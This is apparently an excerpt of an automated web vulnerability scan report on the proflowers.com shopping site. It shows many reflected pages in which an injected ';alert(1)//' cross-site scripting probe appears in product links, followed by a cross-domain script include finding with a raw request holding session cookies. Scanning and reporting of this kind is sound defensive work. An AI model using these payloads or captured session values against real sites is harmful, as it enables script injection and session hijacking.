FreeVase=false" href="http://products.proflowers.com/flowers/Mothers-Day-Tradition-41215?viewpos=47&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
tp://products.proflowers.com/flowers/Purple-Petals-954?viewpos=48&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurppetals11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Purple Petals" border="0" /></a>
...[SNIP]...
k="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Purple-Petals-954?viewpos=48&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
/products.proflowers.com/tulips/30-Tulips-for-Mom-3669?viewpos=49&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30assrt_tv11_catalog_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="30 Tulips for Mom" border="0" /></a>
...[SNIP]...
xitMVTFreeVase=false" href="http://products.proflowers.com/tulips/30-Tulips-for-Mom-3669?viewpos=49&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
tp://products.proflowers.com/flowers/20-Blue-Iris-1806?viewpos=50&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20blue_gv11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="20 Blue Iris" border="0" /></a>
...[SNIP]...
k="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/20-Blue-Iris-1806?viewpos=50&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
roducts.proflowers.com/flowers/Spring-Spectacular-5543?viewpos=51&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec_pnk10_3_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Spring Spectacular" border="0" /></a>
...[SNIP]...
tMVTFreeVase=false" href="http://products.proflowers.com/flowers/Spring-Spectacular-5543?viewpos=51&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
roducts.proflowers.com/flowers/All-the-Frills-30003887?viewpos=52&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQlittleallthefrills_grn11_2_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="All the Frills" border="0" /></a>
...[SNIP]...
tMVTFreeVase=false" href="http://products.proflowers.com/flowers/All-the-Frills-30003887?viewpos=52&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
/products.proflowers.com/flowers/20-White-Tulips-41147?viewpos=53&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL24white_pnk11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="20 White Tulips" border="0" /></a>
...[SNIP]...
xitMVTFreeVase=false" href="http://products.proflowers.com/flowers/20-White-Tulips-41147?viewpos=53&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
wers.com/flowers/Fragrant-Stargazer-Lilies-for-Mom-749?viewpos=54&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYstargazer_pnk09_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Fragrant Stargazer Lilies for Mom" border="0" /></a>
...[SNIP]...
alse" href="http://products.proflowers.com/flowers/Fragrant-Stargazer-Lilies-for-Mom-749?viewpos=54&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
owers.com/flowers/Lily-of-the-Valley-Bulb-Garden-42773?viewpos=55&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Lily of the Valley Bulb Garden" border="0" /></a>
...[SNIP]...
false" href="http://products.proflowers.com/flowers/Lily-of-the-Valley-Bulb-Garden-42773?viewpos=55&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
oducts.proflowers.com/plants/Potted-Blue-Hydrangea-593?viewpos=56&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted Blue Hydrangea" border="0" /></a>
...[SNIP]...
MVTFreeVase=false" href="http://products.proflowers.com/plants/Potted-Blue-Hydrangea-593?viewpos=56&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
roducts.proflowers.com/lilies/Sympathy-Lilies-30002099?viewpos=57&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYwhtories09_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Sympathy Lilies" border="0" /></a>
...[SNIP]...
tMVTFreeVase=false" href="http://products.proflowers.com/lilies/Sympathy-Lilies-30002099?viewpos=57&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
p://products.proflowers.com/tulips/Tulips-for-Mom-4811?viewpos=58&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15assrt_sgv09_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Tulips for Mom" border="0" /></a>
...[SNIP]...
="exitMVTFreeVase=false" href="http://products.proflowers.com/tulips/Tulips-for-Mom-4811?viewpos=58&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
.proflowers.com/wine/Moms-Wine-Country-Picnic-30000036?viewpos=59&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GFB_11_CKNWPICNIC_WIN_SPR_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Mom&#39;s Wine Country Picnic" border="0" /></a>
...[SNIP]...
eVase=false" href="http://products.proflowers.com/wine/Moms-Wine-Country-Picnic-30000036?viewpos=59&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
flowers.com/roses/Two-Dozen-Assorted-Petite-Roses-4768?viewpos=60&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrtpet_grn10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Two Dozen Assorted Petite Roses" border="0" /></a>
...[SNIP]...
e=false" href="http://products.proflowers.com/roses/Two-Dozen-Assorted-Petite-Roses-4768?viewpos=60&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
flowers.com/roses/One-Dozen-Long-Stemmed-Red-Roses-503?viewpos=61&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="One Dozen Long Stemmed Red Roses" border="0" /></a>
...[SNIP]...
e=false" href="http://products.proflowers.com/roses/One-Dozen-Long-Stemmed-Red-Roses-503?viewpos=61&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
s.proflowers.com/wine/Classic-Merlot-Gift-Box-30000084?viewpos=62&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WIN_CKNWVIVARED_ClassicMerlot_GEN_10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Classic Merlot Gift Box" border="0" /></a>
...[SNIP]...
eeVase=false" href="http://products.proflowers.com/wine/Classic-Merlot-Gift-Box-30000084?viewpos=62&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
wers.com/orchids/Deluxe-Purple-Dendrobium-Orchids-8104?viewpos=63&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ30orchpurp_purpletrmp11_USWeekly_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe Purple Dendrobium Orchids" border="0" /></a>
...[SNIP]...
alse" href="http://products.proflowers.com/orchids/Deluxe-Purple-Dendrobium-Orchids-8104?viewpos=63&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ducts.proflowers.com/roses/Premium-Elegance-Roses-1118?viewpos=64&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PRMelegance_grnp10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Premium Elegance Roses" border="0" /></a>
...[SNIP]...
VTFreeVase=false" href="http://products.proflowers.com/roses/Premium-Elegance-Roses-1118?viewpos=64&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
products.proflowers.com/flowers/Sunshiny-Days-30008371?viewpos=65&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewspringdays_grn10_3_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Sunshiny Days" border="0" /></a>
...[SNIP]...
itMVTFreeVase=false" href="http://products.proflowers.com/flowers/Sunshiny-Days-30008371?viewpos=65&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
wers.com/flowers/Roses-and-Carnations-for-Mom-30050115?viewpos=66&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringrosescarns_pnk11_catalog_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Roses and Carnations for Mom" border="0" /></a>
...[SNIP]...
alse" href="http://products.proflowers.com/flowers/Roses-and-Carnations-for-Mom-30050115?viewpos=66&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ducts.proflowers.com/flowers/A-Mothers-Dreams-30050116?viewpos=67&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringmix11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="A Mother’s Dreams" border="0" /></a>
...[SNIP]...
VTFreeVase=false" href="http://products.proflowers.com/flowers/A-Mothers-Dreams-30050116?viewpos=67&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div id="PFCfooterRibbonImage"> <img class="Ribbon25Mil" border="0" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" border="0" /> </div>
...[SNIP]...
:emailInput" type="text" value="Enter Your Email Here" id="_ctl29_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.prvd.com/Careers_Overview.aspx">CAREERS</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/privacy.aspx">PRIVACY POLICY</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/terms.aspx">TERMS OF USE</a>
...[SNIP]...
at least 7 days." border="0" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." border="0" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home décor." border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proplants.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home décor." border="0" /></a>
...[SNIP]...
rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/international?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" border="0" /></a> <a title="The place for unique and personalized gifts." border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.redenvelope.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." border="0" /></a> <a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.cherrymoonfarms.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" /></a><a title="Unique personalized gifts for life’s special occasions." 
border="0" onclick="exitMVTFreeVase=false" href="http://www.personalcreations.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life’s special occasions." border="0" /></a> <a title="Gourmet hand-dipped berries, cookies and cakes." border="0" onclick="exitMVTFreeVase=false" href="http://www.berries.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." border="0" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript><img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;"></noscript>
...[SNIP]...
</span> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

17. Cross-domain script include
There are 31 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If a third-party script appears to fulfil a requirement you have, you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons), you should consider reimplementing the script's functionality within your own code.


17.1. https://accounts.proflowers.com/CustomerLogin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /CustomerLogin.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /CustomerLogin.aspx?Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: https://accounts.proflowers.com/Default.aspx?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=tjb3lzavlroebrfrqg11rbq2; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX

Response

HTTP/1.1 200 OK
Cache-Control: private
